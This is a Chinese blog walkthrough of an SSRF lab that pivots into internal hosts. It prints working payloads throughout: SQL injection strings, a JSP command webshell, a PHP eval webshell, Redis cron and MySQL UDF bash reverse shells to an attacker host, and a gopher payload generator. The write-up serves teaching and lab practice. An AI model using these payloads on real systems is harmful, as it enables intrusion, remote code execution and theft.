0x0前言

靶场网络拓扑如下

92883-rn4n90qpxcd.png

172.172.0.10 这个服务器的 Web 80 端口存在 SSRF 漏洞,并且 80 端口映射到了公网,此时攻击者通过公网可以借助 SSRF 漏洞发起对 172 目标内网的探测和攻击。

大部分源码采用自国光师傅的项目,修改了一两个靶机的内容
https://github.com/sqlsec/ssrf-vuls

要靶场的话可以与我联系(我搭的那么烂可能没人想要)

0x01 判断 SSRF并获取信息

SSRF形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,文档,等等。
下面这个功能点是获取网站快照

69614-tndfk5ot85f.png

正常业务情况是请求网站然后响应内容,但是没做好过滤可以使用其他协议,配合 file 协议来读取本地的文件信息,首先尝试使用 file 协议来读取 /etc/passwd 文件试试看:

file:///etc/passwd

78756-9er4vpqham8.png

然后Linux的话可以通过读取/etc/hosts来获取当前主机的ip

file:///etc/hosts

66142-h369bp33i2e.png
得到当前的主机ip为172.172.0.10 权限高的情况下还可以尝试读取 /proc/net/arp 或者 /etc/network/interfaces 来判断当前机器的网络情况

0x01 172.1720.1/24 - SSRF 探测内网端口

SSRF 常配合 DICT 协议探测内网端口开放情况,但不是所有的端口都可以被探测,一般只能探测出一些带 TCP 回显的端口
burp爆破模块对ip c段跟端口进行选择然后攻击模式选择Cluster bomb

40044-fzx69x100xv.png

第一个位置选择1到255也就是一个c段

42286-43y621vg8r.png

第二个是要探测的端口

88273-cc5dvx1sk0c.png

得到的端口开放信息

25681-yrvg1nsgibb.png

通过爆破可以得到端口的开放情况(开放的可能更多,上帝视角列出能打的):

172.172.0.15 6379
172.172.0.2 6379 
172.172.0.18 3306
172.172.0.59 80,3306
172.172.0.25 80
172.172.0.50 80
172.172.0.10 80

0x02 172.172.0.50代码注入

通过ssrf先请求一下发现了一个首页显示Hello CodeExec

74825-n6nl3eynt1.png

对这个进行SSRF目录扫描

54154-mqsyiz1cr5.png

然后添加目录字典

55186-b57nh5olwi.png

通过长度可以可以看出来存在着 phpinfo.php 和 shell.php:

44623-t42ox9y424h.png

访问一下shell.php一个简单的命令执行

42177-xf9nzxrau3h.png

直接使用 SSRF 的 HTTP 协议来发起 GET 请求,直接给 cmd 参数传入命令值,来命令直接执行:

37588-c1zudcbtp5s.png

查看一下这台的hosts文件

47658-xyvw28zk1b.png

0x03 172.172.0.59Sql注入

请求页面发现是一个查询的功能点

98531-0msr985bbi3.png

通过查看html表单可以发现是通过get传给当前文件的参数是username

89536-z04l3rab9wf.png

查询一下admin

37612-3jcg64kw8ei.png

加个单引号发现报错了

00578-le5kefz9cr.png

存在报错我们直接构造报错注入payload

172.172.0.59?username=admin'-updatexml(1,concat(0x7e,user()),1)-'

33263-471qxtwucgg.png

使用sqlmap

sqlmap -u "http://10.68.1.51/" --data "url="  --prefix "172.172.0.59?username=admin'" --dbms mysql -p url --tech E -v 3 --level 3 --tamper space2comment   -D "user" --dump

成功跑出注入

58166-zw7wz83qjns.png

0x04 172.172.0.25 uploadfile

发现是一个头像上传的功能点

17762-ddqf8o19f7p.png

查看表单可以看到上传到当前文件,文件名是file

70735-zgfaighntf.png

上传是通过 POST ,我们无法使用使用 SSRF 漏洞通过 HTTP 协议来传递 POST 数据,这种情况下一般就得利用 gopher 协议来发起对内网应用的 POST 请求了,gopher 的基本请求格式如下:

gopher://IP:port/_{TCP/IP数据流}

gopher 协议是一个古老且强大的协议,从请求格式可以看出来,可以传递最底层的 TCP 数据流,因为 HTTP 协议也是属于 TCP 数据层的,所以通过 gopher 协议传递 HTTP 的 POST 请求也是轻而易举的。
首先来抓取正常情况下 POST 请求的数据包,删除掉 HTTP 请求的这一行如果不删除的话,打出的 SSRF 请求会乱码,因为被两次 gzip 编码了。

Accept-Encoding: gzip, deflate

接着在 Burpsuite 中将本 POST 数据包进行两次 URL 编码:

26246-5owb0c8lou4.png

两次 URL 编码后的数据就最终的 TCP 数据流,最终 SSRF 完整的攻击请求的 POST 数据包如下:

gopher://172.172.0.25:80/_{url编码两次的数据包}

上传成功

70682-u5t5wertyue.png

请求php文件成功

16485-gwczhq9ficv.png

0x05 172.172.0.42 tomcat-CVE-2017-12615

跟上面一样只是发送的包是put的,准备一个jsp一句话

<%
    String command = request.getParameter("cmd");
    if(command != null)
    {
        java.io.InputStream in=Runtime.getRuntime().exec(command).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1)
        {
            out.println(new String(b));
        }
        out.print("</pre>");
    } else {
        out.print("format: xxx.jsp?cmd=Command");
    }
%>

准备攻击数据包,将个 POST 请求二次 URL 编码

24601-6xqebrozkoq.png

通过 SSRF 发起这个 POST 请求

73343-7p4c5l8y6cb.png

接着通过 SSRF 发起对 mo60.jsp 的 HTTP 请求,成功执行了id 的命令:

51451-zjabw0hf75.png

0x05 172.172.0.2 Redis 未授权

系统没有 Web 服务(无法写 Shell),无 SSH 公私钥认证(无法写公钥),所以这里攻击思路只能是使用定时任务来进行攻击了。常规的攻击思路的主要命令如下:

# 清空 key
flushall
 
# 设置要操作的路径为定时任务目录
config set dir /var/spool/cron/
 
# 设置定时任务角色为 root
config set dbfilename root
 
# 设置定时任务内容
set x "\n* * * * * /bin/bash -i >& /dev/tcp/x.x.x.x/2333 0>&1\n"
 
# 保存操作
save

未授权的情况下可以使用 dict 或者 gopher 协议来进行攻击,因为 gopher 协议构造比较繁琐,所以使用 DICT 协议来攻击

dict://x.x.x.x:6379/<Redis 命令>

成功执行info命令

85548-oc331nnt29j.png

用 dict 协议来创建定时任务来反弹 Shell:

# 清空 key
dict://172.172.0.2:6379/flushall
 
# 设置要操作的路径为定时任务目录
dict://172.172.0.2:6379/config set dir /var/spool/cron/
 
# 在定时任务目录下创建 root 的定时任务文件
dict://172.172.0.2:6379/config set dbfilename root
 
# 写入 Bash 反弹 shell 的 payload
dict://172.172.0.2:6379/set x "\n* * * * * /bin/bash -i >& /dev/tcp/x.x.x.x/2333 0>&1\n"
 
# 保存上述操作
dict://172.172.0.2:6379/save

成功反弹回来shell

59588-jpg6dskjs19.png

0x06 172.172.0.15 授权redis

有密码验证,无法直接未授权执行命令:

41912-4cyhqckeole.png

除了 6379 端口还开放了 80 端口,是一个经典的 LFI 本地文件包含,可以利用此来读取本地的文件内容:

95677-ssuidkqgft8.png

因为 Redis 密码记录在 redis.conf 配置文件中,结合这个文件包含漏洞点,那么这时来尝试借助文件包含漏洞来读取 redis 的配置文件信息,Redis 常见的配置文件路径如下,也有是通过了其他方法拿到了密码比如Spring boot heapdump

/etc/redis.conf
/etc/redis/redis.conf
/usr/local/redis/etc/redis.conf
/opt/redis/ect/redis.conf

成功读取到 /etc/redis.conf 配置文件,直接搜索 requirepass 关键词来定位寻找密码:

32831-d558alvg3pi.png

有密码可以使用dicty验证一下是否正确,但是因为 dict 不支持多行命令的原因,这样就导致认证后的参数无法执行

dict://172.172.0.15:6379/auth P@ssw0rd

61791-nyktgb2ocy.png

gopher 协议因为需要原生数据包,所以我们需要抓取到 Redis 的请求数据包,在本地安装Redis,用root身份启动Redis-server,利用socat 做端口转发并抓取Redis-cli 和Redis-server通信的数据。

socat -v tcp-listen:5201,fork tcp-connect:localhost:6379    #端口转发并抓取数据

此时使用 redis-cli 连接本地的 5201 端口:

redis-cli -h 127.0.0.1 -p 5201

服务器接着会把 5201 端口的流量接受并转发给服务器的 6379 端口,然后认证后进行往网站目录下写入 shell 的操作:

# 认证 redis
127.0.0.1:5201> auth P@ssw0rd
OK
# 清空 key
127.0.0.1:5201> flushall
 
# 设置要操作的路径为网站根目录
127.0.0.1:5201> config set dir /var/www/html
 
# 在网站目录下创建 shell.php 文件
127.0.0.1:5201> config set dbfilename shell.php
 
# 设置 shell.php 的内容
127.0.0.1:5201> set x "\n<?php eval($_GET[1]);?>\n"
 
# 保存上述操作
127.0.0.1:5201> save

36251-38itnqp75pd.png

57841-yro1c3xjo7p.png

与此同时我们还可以看到详细的数据包情况,下面来记录一下关键的流量情况:
接下来整理出关键的请求数据包如下:

*2\r
$4\r
auth\r
$8\r
P@ssw0rd\r
*1\r
$8\r
flushall\r
*4\r
$6\r
config\r
$3\r
set\r
$3\r
dir\r
$13\r
/var/www/html\r
*4\r
$6\r
config\r
$3\r
set\r
$10\r
dbfilename\r
$9\r
shell.php\r
*3\r
$3\r
set\r
$1\r
x\r
$25\r
 
 
<?php eval($_GET[1]);?>
 
 
\r
*1\r
$4\r
save\r

可以看到每行都是以 r 结尾的,但是 Redis 的协议是以 CRLF (rn) 结尾,所以转换的时候需要把 r 转换为 rn,这里使用七友师傅编写的python脚本

import urllib.parse

protocol = "gopher://"
ip = "127.0.0.1"
port = "6788"
shell = "\n\n<?php phpinfo();?>\n\n"
filename = "mo60.php"
path = "/var/www/html"
passwd = "P@ssw0rd"
cmd = ["flushall",
     "set 1 {}".format(shell.replace(" ","${IFS}")),  
     "config set dir {}".format(path),
     "config set dbfilename {}".format(filename),
     "save",
     "quit"
    ]
if passwd:
    cmd.insert(0,"AUTH {}".format(passwd))
payload = protocol + ip + ":" + port + "/_"
def redis_format(arr):
    CRLF = "\r\n"
    redis_arr = arr.split(" ")
    cmd = ""
    cmd += "*" + str(len(redis_arr))
    for x in redis_arr:
        cmd += CRLF + "$" + str(len((x.replace("${IFS}"," ")))) + CRLF + x.replace("${IFS}"," ")
    cmd += CRLF
    return cmd

if __name__=="__main__":
    for x in cmd:
        payload += urllib.parse.quote(redis_format(x))

    # print(payload)
    print(urllib.parse.quote(payload))
 

发送返回ok

75954-tzhgi07j0k.png

发送的数据如下

url=gopher://172.172.0.15:6379/_%252A2%250D%250A%25244%250D%250AAUTH%250D%250A%25248%250D%250AP%2540ssw0rd%250D%250A%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252422%250D%250A%250A%250A%253C%253Fphp%2520phpinfo%2528%2529%253B%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252413%250D%250A/var/www/html%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25248%250D%250Amo60.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%252A1%250D%250A%25244%250D%250Aquit%250D%250A

尝试访问,成功

60604-4l410i9z52b.png

也可以通过计划任务反弹shell

65460-iccnp111hfk.png

成功接收到

40947-w5daxlipby.png

0x07 172.172.0.18 未授权Mysql

MySQL 需要密码认证时,服务器先发送 salt 然后客户端使用 salt 加密密码然后验证;但是当无需密码认证时直接发送 TCP/IP 数据包即可。所以这种情况下是可以直接利用 SSRF 漏洞攻击 MySQL 的。因为使用 gopher 协议进行攻击需要原始的 MySQL 请求的 TCP 数据包,所以还是和攻击 Redis 应用一样,这里我们使用 tcpdump 来监听抓取 3306 的认证的原始数据包:

# lo 回环接口网卡 -w 报错 pcapng 数据包
tcpdump -i lo port 3306 -w mysql.pcapng

然后本地使用 MySQL 来执行一些测试命令:

[root@localhost]# mysql -uroot -h127.0.0.1 -e "select * from flag.test";
+----+----------------------------------------+
| id | flag                                   |
+----+----------------------------------------+
|  1 | flag{71a5d5e6b2b9a3da3dc0a85851d50316} |
+----+----------------------------------------+

Wireshark 打开 mysql.pcapng 数据包,追踪 TCP 流 然后过滤出发给 3306 的数据然后过滤出客户端发送到MySQL服务器的数据包,将显示格式调整为原始数据即可:

81830-ph696qxna6b.png

然后使用如下的 Python3 脚本将数据转化为 url 编码:

import sys

def results(s):
    a=[s[i:i+2] for i in range(0,len(s),2)]
    return "curl gopher://127.0.0.1:3306/_%"+"%".join(a)

s="3c00000185a20f0000000001210000000000000000000000000000000000000000000000726f6f7400006d7973716c5f6e61746976655f70617373776f726400210000000373656c65637420404076657273696f6e5f636f6d6d656e74206c696d69742031180000000373656c656374202a2066726f6d20666c61672e746573740100000001"

print(results(s))

24171-mtqdgl260f.png

放入到 BP 中请求的话记得需要二次 URL 编码,成功查询到flag

58024-tt42tmq7t6.png

使用脚本
https://github.com/tarunkant/Gopherus
来生成查看插件目录的exp

show variables like '%plugin%'

68975-xvvhp60qkmg.png

放入到 BP 中请求的话记得需要二次 URL 编码,可以直接获取到MySQL 的插件目录为:/usr/lib/mysql/plugin/

65732-78d6fypudjx.png

使用国光师傅的网站https://www.sqlsec.com/udf/

28659-bz3i179vexm.png

然后用脚本生成上方语句的payload,写入udf文件,,这里的操作我使用脚本没有完成功要使用tcpdump 监听到的原始数据后,转换 gopher 协议,BP 二次编码请求一下

69880-6soey76z242.png

创建自定义函数

CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.so';

最后通过创建的自定义函数并执行系统命令将 shell 弹出来,原生命令如下:

select sys_eval('echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMi4xNjYvNTU1NSAwPiYx|base64 -d|bash -i');

0x08参考

https://www.cnblogs.com/aninock/p/15663953.html
https://www.sqlsec.com/2021/05/ssrf.html

Last modification:September 23, 2022
  • 本文作者:Juneha
  • 本文链接:https://blog.mo60.cn/index.php/archives/425.html
  • 版权声明:本博客所有文章除特别声明外,均默认采用 CC BY-NC-SA 4.0 许可协议。
  • 法律说明:
  • 文章声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任,本人坚决反对利用文章内容进行恶意攻击行为,推荐大家在了解技术原理的前提下,更好的维护个人信息安全、企业安全、国家安全,本文内容未隐讳任何个人、群体、公司。非文学作品,请勿过度理解,根据《计算机软件保护条例》第十七条,本站所有软件请仅用于学习研究用途。
如果觉得我的文章对你有用,请随意赞赏,可备注留下ID方便感谢